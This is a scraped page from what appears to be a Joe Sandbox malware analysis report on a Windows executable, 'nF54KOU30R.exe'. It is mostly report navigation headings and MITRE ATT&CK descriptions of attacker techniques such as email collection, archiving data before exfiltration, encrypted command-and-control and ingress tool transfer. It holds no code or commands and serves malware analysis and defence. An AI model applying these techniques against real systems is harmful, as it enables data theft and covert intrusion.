Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report nF54KOU30R.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

Windows Analysis Report
nF54KOU30R.exe

Function 000001F0D53B1CD0 Relevance: 4.8, APIs: 3, Instructions: 278
memorynativeCOMMON

Function 000001F0D53B1A90 Relevance: 4.6, APIs: 3, Instructions: 150
nativeCOMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre